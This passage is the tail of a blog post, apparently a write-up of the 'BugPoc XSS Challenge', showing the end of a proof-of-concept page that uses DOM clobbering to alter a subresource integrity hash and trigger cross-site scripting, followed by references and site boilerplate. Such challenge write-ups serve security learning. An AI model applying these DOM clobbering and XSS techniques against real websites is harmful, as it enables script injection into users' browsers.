<span class="built_in">window</span>.name = <span class="string">&#x27;iframe&#x27;</span>;</span></span><br><span class="line"><span class="javascript">                <span class="built_in">window</span>.location = url;</span></span><br><span class="line">            &#125;</span><br><span class="line">        <span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"></span><br><span class="line">        <span class="tag">&lt;<span class="name">h1</span>&gt;</span>BugPoc XSS Challenge<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">h3</span>&gt;</span>If you click the button below and Enter the `console.log(fileIntegrity.value);` on the chrome console window, You can see that the hash value has been modified to &#x27;Modified&#x27;<span class="tag">&lt;/<span class="name">h3</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&#x27;button&#x27;</span> <span class="attr">onclick</span>= <span class="string">&#x27;Dom_Clobbering()&#x27;</span> <span class="attr">value</span>=<span class="string">&#x27;Test&#x27;</span>&gt;</span></span><br><span class="line"></span><br><span class="line">        <span class="tag">&lt;<span class="name">h3</span>&gt;</span>If you click the button below and execute poc code, You can trigger the xss.<span class="tag">&lt;/<span class="name">h3</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">&#x27;button&#x27;</span> <span class="attr">onclick</span>= <span class="string">&#x27;exploit()&#x27;</span> <span class="attr">value</span>=<span class="string">&#x27;Trigger&#x27;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<hr>
<h2 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h2><p><a target="_blank" rel="noopener" href="https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity">https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity</a><br><br><a target="_blank" rel="noopener" href="https://portswigger.net/research/dom-clobbering-strikes-back">https://portswigger.net/research/dom-clobbering-strikes-back</a><br><br><a target="_blank" rel="noopener" href="https://csp-evaluator.withgoogle.com/">https://csp-evaluator.withgoogle.com/</a></p>
<hr>

  </div>
</article>

    <div class="blog-post-comments">
        <div id="disqus_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/categories/">Category</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Descriptions"><span class="toc-number">1.</span> <span class="toc-text">Descriptions</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis"><span class="toc-number">2.</span> <span class="toc-text">Analysis</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Poc-Sollution"><span class="toc-number"></span> <span class="toc-text">Poc (Sollution)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Reference"><span class="toc-number">1.</span> <span class="toc-text">Reference</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/06/10/2021-06-10-bugpoc/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/06/10/2021-06-10-bugpoc/&text=BugPoc XSS Challenge Write Up"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/06/10/2021-06-10-bugpoc/&title=BugPoc XSS Challenge Write Up"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/06/10/2021-06-10-bugpoc/&is_video=false&description=BugPoc XSS Challenge Write Up"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=BugPoc XSS Challenge Write Up&body=Check out this article: http://example.com/2021/06/10/2021-06-10-bugpoc/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2021/06/10/2021-06-10-bugpoc/&title=BugPoc XSS Challenge Write Up"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2021/06/10/2021-06-10-bugpoc/&title=BugPoc XSS Challenge Write Up"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2021/06/10/2021-06-10-bugpoc/&title=BugPoc XSS Challenge Write Up"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2021/06/10/2021-06-10-bugpoc/&title=BugPoc XSS Challenge Write Up"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2021/06/10/2021-06-10-bugpoc/&name=BugPoc XSS Challenge Write Up&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2021/06/10/2021-06-10-bugpoc/&t=BugPoc XSS Challenge Write Up"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2020-2021
    Jeongwon Jo
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/search/">Search</a></li>
         
          <li><a href="/categories/">Category</a></li>
        
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->

<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">


<link rel="stylesheet" href="/lib/justified-gallery/css/justifiedGallery.min.css">


    <!-- jquery -->

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/justified-gallery/js/jquery.justifiedGallery.min.js"></script>

<!-- clipboard -->

  
<script src="/lib/clipboard/clipboard.min.js"></script>

  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->

    <script type="text/javascript">
        var disqus_shortname = 'https-pocas-kr';

        (function(){
            var dsq = document.createElement('script');
            dsq.type = 'text/javascript';
            dsq.async = true;
            dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        }());
    </script>


</body>
</html>
